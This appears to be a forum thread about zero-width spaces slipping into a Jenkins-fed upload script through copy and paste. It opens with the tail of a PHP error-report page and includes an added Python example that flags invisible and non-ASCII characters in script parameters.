    			<p>If this message persists, or you think that it is in error. Please contact the Web Site Owner with the information detailed below so that they can notify the [redacted] Support Team. Thank you.</p>
    			<div id="report_container">
    				<div class="report_line"><div class="report_prompt">URL Address: </div><div class="report_data">'. htmlspecialchars($thisSite.$thisRequest,ENT_QUOTES).'</div></div>
    				<div class="report_line"><div class="report_prompt">Trap Condition: </div><div class="report_data">'.$trappedCondition.'</div></div>
    				<div class="report_line"><div class="report_prompt">Trap Location: </div><div class="report_data">'.$trappedLocation.'</div></div>
    				<div class="report_line"><div class="report_prompt">Trap Context: </div><div class="report_data">'.htmlspecialchars($trappedContext,ENT_QUOTES).'</div></div>
    				<div class="report_line"><div class="report_prompt">Trap Reference: </div><div class="report_data">'.$errorRef.'</div></div>
    			</div>
    		</div>
    	</body>
    </html>';
    		$timeToDie = true;
    	}
    	if($timeToDie){die();}
    ?>


  • […] what happens when you try to Tweet a zero-width space (U+200B) on Twitter.

    Funny. Just a week or two ago we had a problem with that very character. When Jenkins renders the list of jobs, it inserts a bunch of them in the descriptions, presumably to adjust line breaks. When a colleague copied part of the description into parameters of the next job, it got on input of a script that uploads the artefacts. And that failed, because it didn't expect non-ascii. There normally isn't much reason for giving it non-ascii; it just got it by coincidence.

    Just shows that users can, pretty easily, unknowingly type that by copy&paste.
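
An added example, not part of the post above and not code from Jenkins or the upload script: one way a script that expects ASCII parameters can reject copy-pasted input with a message that shows the invisible character instead of failing opaquely. The parameter name `ARTIFACT_TAG` and the sample value are constructed for illustration.

```python
import unicodedata

# Constructed sample: text copied from a rendered page that inserted
# zero-width spaces (U+200B) at line-break opportunities.
COPIED_PARAM = "release\u200b-1.4\u200b-beta"


def is_invisible(ch):
    """True for format (Cf) and control (Cc) characters other than tab/newline.

    Cf includes U+200B ZERO WIDTH SPACE, the zero-width joiners, U+FEFF and
    the bidirectional controls, none of which show up in a text field.
    """
    return unicodedata.category(ch) in ("Cf", "Cc") and ch not in "\t\n\r"


def find_invisible(text):
    """Return (index, 'U+XXXX', Unicode name) for each invisible character."""
    return [(i, f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>"))
            for i, ch in enumerate(text) if is_invisible(ch)]


def visible(text):
    """Escape invisible characters so they can be seen in logs and errors."""
    return "".join(f"<U+{ord(c):04X}>" if is_invisible(c) else c for c in text)


def check_param(name, value, ascii_only=True):
    """Return a list of problems for one parameter; empty list means accept."""
    problems = [f"{name}: invisible {cp} {uname} at index {i}"
                for i, cp, uname in find_invisible(value)]
    if ascii_only:
        problems += [f"{name}: non-ASCII {ch!r} (U+{ord(ch):04X}) at index {i}"
                     for i, ch in enumerate(value)
                     if ord(ch) > 127 and not is_invisible(ch)]
    return problems


if __name__ == "__main__":
    for problem in check_param("ARTIFACT_TAG", COPIED_PARAM):
        print(problem)
    print("value as received:", visible(COPIED_PARAM))
```

Rejecting with the escaped value, rather than silently stripping the character, keeps the person who pasted it aware that the source text was not what it appeared to be.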



  • @Bulb said:

    There normally isn't much reason for giving it non-ascii; it just got it by coincidence.

    FUCK YOU JENKINS WHY CAN'T I HAVE AN Ą IN A NAME



  • Well, it was just internal script and internal description of the release. Jenkins itself accepts unicode just fine. Though the first time it failed, it was me who wrote beta as β.



  • Ask @Gaska



  • @Bulb said:

    Well, it was just internal script and internal description of the release. Jenkins itself accepts unicode just fine.

    Considering that 99% of all Jenkins instances are in 99% made of internal scripts, that's kinda a valid complaint on @Maciejacośtam's part.

    @Maciejasjmj said:

    FUCK YOU JENKINS WHY CAN'T I HAVE AN Ą IN A NAME

    Bonus WTF: I couldn't put grammatically correct sentence as my "full name" field because of length limit. That's also why it mentions "name" and not "username", which I originally wanted to use. Also, that's why it has no punctuation whatsoever - under normal circumstances, I would put at least four shebangsinterrobangs at the end.

